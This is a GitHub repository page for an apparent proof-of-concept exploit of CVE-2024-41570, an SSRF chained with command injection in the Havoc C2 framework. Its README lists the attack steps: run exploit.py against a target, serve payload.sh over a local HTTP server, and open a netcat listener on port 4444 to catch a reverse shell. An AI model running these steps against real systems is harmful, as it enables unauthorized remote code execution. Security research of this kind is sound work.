Skip to content
/ Havoc-C2-RCE-2024 Public

SSRF to deliver an authenticated command injection payload

2 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

dxlerYT/Havoc-C2-RCE-2024

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
README.md
README.md
 
 
exploit.py
exploit.py
 
 
payload.sh
payload.sh
 
 

Repository files navigation

Authenticated Havoc-Chained-RCE (CVE-2024-41570)

GitHub GitHub last commit GitHub issues

A proof-of-concept (PoC) click here

Overview

This repository contains a proof-of-concept (PoC) exploit for a Remote Code Execution (RCE) vulnerability discovered in Havoc C2 in 2024. The exploit demonstrates how an attacker could potentially execute arbitrary code on a target system running a vulnerable version of Havoc C2.

Note: This project is intended for educational and research purposes only. Do not use this code for malicious purposes.

Installation

To use this PoC, follow these steps:

  1. Clone the repository: 
    git clone https://github.com/dxlerYT/Havoc-C2-RCE-2024.git
cd Havoc-C2-RCE-2024
Edit payload.sh
sudo python3 exploit.py --target https://$IP -i 127.0.0.1 -p 40056
python3 -m http.server 8000
nc -nvlp 4444

About

SSRF to deliver an authenticated command injection payload

Resources

Readme
Activity

Stars

2 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages